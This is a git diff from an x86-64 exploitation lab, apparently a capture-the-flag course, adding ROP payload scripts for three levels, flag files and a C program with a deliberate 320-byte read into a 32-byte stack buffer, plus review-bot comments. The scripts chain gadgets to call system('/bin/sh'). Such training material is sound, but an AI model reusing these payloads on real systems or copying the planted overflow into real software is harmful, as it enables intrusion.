diff --git a/4/level3/test.sh b/4/level3/test.sh
new file mode 100755
index 0000000..22c46e4
--- /dev/null
+++ b/4/level3/test.sh
@@ -0,0 +1,8 @@
+OLDFLAG="hacklab{w3lc0m3_t0_x86_64_explo1t4t1on_I0vGIviy}"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00"
+GADGET1="\xc3\x12\x40\00\00\00\00\00"
+CMDADDR="\x08\x20\x40\00\00\00\00\00"
+CMDCALL="\x96\x11\x40\00\00\00\00\00"
+
+printf "$OLDFLAG\n$PADDING$SAVERBP$GADGET1$CMDADDR$CMDCALL\ncat flag.txt\n" > input.txt
diff --git a/4/level4/test.sh b/4/level4/test.sh
new file mode 100755
index 0000000..dc11693
--- /dev/null
+++ b/4/level4/test.sh
@@ -0,0 +1,9 @@
+OLDFLAG="hacklab{n3w_c4ll1ng_c0nv3nt1ons!_wYLVjeJr}"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #32
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00" #kind of irrelevant
+GADGET1="\xa4\x12\x40\00\00\00\00\00" #ret (for stack alignment)
+GADGET2="\xa3\x12\x40\00\00\00\00\00" #pop rdi, ret
+CMDADDR="\x08\x20\x40\00\00\00\00\00"
+CMDCALL="\x96\x11\x40\00\00\00\00\00"
+
+printf "$OLDFLAG\n$PADDING$SAVERBP$GADGET1$GADGET2$CMDADDR$CMDCALL\ncat flag.txt\n" > input.txt
diff --git a/4/level5/flag.txt b/4/level5/flag.txt
new file mode 100644
index 0000000..edd5b55
--- /dev/null
+++ b/4/level5/flag.txt
@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}
diff --git a/4/level5/input.txt b/4/level5/input.txt
new file mode 100644
index 0000000..7779602
Binary files /dev/null and b/4/level5/input.txt differ
diff --git a/4/level5/level5 b/4/level5/level5
new file mode 100755
index 0000000..069e0cd
Binary files /dev/null and b/4/level5/level5 differ
diff --git a/4/level5/level5.c b/4/level5/level5.c
new file mode 100644
index 0000000..e9270d2
--- /dev/null
+++ b/4/level5/level5.c
@@ -0,0 +1,17 @@
+// gcc -o level5 -no-pie -fno-stack-protector level5.c
+#include
+#include
+
+char command[] = "/bin/sh";
+
+int main(int argc, char **argv) {
+ // Disable output buffering. Not part of the challenge.
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stdin, NULL, _IONBF, 0);
+
+ char buffer[32];
+ puts("What do you want to talk about?");
+ fgets(buffer, 320, stdin);
+ system("echo Bye.");
+ return 0;
+}
diff --git a/4/level5/test.sh b/4/level5/test.sh
new file mode 100755
index 0000000..2b1e0fd
--- /dev/null
+++ b/4/level5/test.sh
@@ -0,0 +1,15 @@
+#ROP
+#0x0000000000401283 : pop rdi ; ret
+
+#objdump
+#0000000000404048 g O .data 0000000000000008 command
+
+OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #32
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00" #kind of irrelevant
+GADGET1="\x84\x12\x40\00\00\00\00\00" #ret (for stack alignment)
+GADGET2="\x83\x12\x40\00\00\00\00\00" #pop rdi, ret
+CMDADDR="\x48\x40\x40\00\00\00\00\00"
+CMDCALL="\x10\x12\x40\00\00\00\00\00"
+
+printf "$OLDFLAG$PADDING$SAVERBP$GADGET2$CMDADDR$CMDCALL\ncat flag.txt\n"
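Review bot: `fgets(buffer, 320, stdin)` in main reads up to 319 bytes into the 32-byte `buffer`, a stack overflow; in production code the bound would be `sizeof buffer` and the binary would not be built with `-fno-stack-protector`. Given the build comment at the top this is presumably the intended vulnerability, so mark it explicitly so a later reader does not silently "fix" the challenge: `fgets(buffer, 320, stdin); // Deliberately oversized read: this overflow is the challenge.` Separately, both `#include` lines carry no header name here, most likely `<stdio.h>` and `<stdlib.h>` lost to angle-bracket stripping on extraction; confirm the committed file has them, since `setvbuf`, `puts`, `fgets` and `system` need them to compile. `argc` and `argv` are unused and could be dropped to `int main(void)`.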
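Review bot: The final `printf` in level5/test.sh writes to stdout, whereas level3 and level4 redirect with `> input.txt`, and this commit also checks in a binary `4/level5/input.txt` alongside the script; the committed blob and the script can drift apart. Either append the same `> input.txt` redirect as the other levels or leave the generated file out of the commit. A smaller inconsistency: here the newline is folded into `OLDFLAG` ("...}\n") while the other two scripts put it in the printf format; pick one form across the three scripts.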